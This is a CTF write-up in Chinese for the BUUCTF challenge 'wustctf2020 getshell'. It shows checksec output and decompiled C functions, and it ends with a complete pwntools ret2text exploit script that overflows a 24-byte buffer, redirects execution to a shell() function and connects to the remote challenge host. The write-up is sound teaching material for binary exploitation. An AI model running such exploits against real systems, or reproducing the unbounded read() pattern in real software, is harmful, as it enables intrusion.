wustctf2020 getshell
# wustctf2020 getshell
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/wustctf2020_getshell/wustctf2020_getshell'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
# 静态分析
主函数如下
/* Decompiler listing of the binary's entry point as shown in the writeup.
 * It calls init() (body not shown on this page), then vulnerable(), and
 * exits normally; argc/argv/envp are never used. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();        /* not listed here; presumably I/O setup - unverified */
vulnerable();  /* the function with the unbounded read() */
return 0;
}
vulnerable函数如下
/* Decompiler listing. buf is 24 bytes and sits at ebp-0x18, i.e. it ends
 * exactly at the saved ebp, yet read() may write up to 0x20 (32) bytes.
 * The 8 excess bytes land on the saved ebp (4) and the saved return
 * address (4), which is the stack-overflow the writeup relies on. The fix
 * on the defending side is a bounded read, e.g. read(0, buf, sizeof(buf)),
 * plus checking the byte count that read() returns. */
ssize_t vulnerable()
{
char buf[24]; // [esp+0h] [ebp-18h] BYREF
return read(0, buf, 0x20u); /* 0x20 > sizeof(buf): 8-byte overflow, return value unchecked */
}
shell函数如下
/* Decompiler listing. Not called from main() or vulnerable() in the
 * listings on this page; it just spawns a shell via system(). This is the
 * "backdoor" function the writeup redirects execution to. Because the
 * binary has no PIE, its address is fixed at link time. */
int shell()
{
return system("/bin/sh");
}
# 思路分析
目前信息:
- vulnerable 函数存在溢出点
- 有后门函数 shell
- No canary found
- NX enabled
- No PIE (0x8048000)
思路:
- 32位 ret2text
# exp
from pwn import *
# i386 matches the checksec output above; debug logging prints every byte sent/received.
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/wustctf2020_getshell/wustctf2020_getshell'
# Remote challenge instance; switch to the process() line below for a local run.
io = remote('node4.buuoj.cn', 27378)
# io = process(pwnfile)
elf = ELF(pwnfile)  # parsed only to resolve the symbol table
# buf is at ebp-0x18 (24 bytes) and is followed by the 4-byte saved ebp;
# the 4 bytes after that are the saved return address.
padding = 0x18+4
# No PIE, so the symbol address is the runtime address.
back_door = elf.symbols['shell']
# 0x18 + 4 + 4 = 0x20 bytes, exactly the limit read() accepts in vulnerable().
payload=flat(['a'*padding,back_door])
io.recv()  # consume whatever the program prints first
io.send(payload)
io.interactive()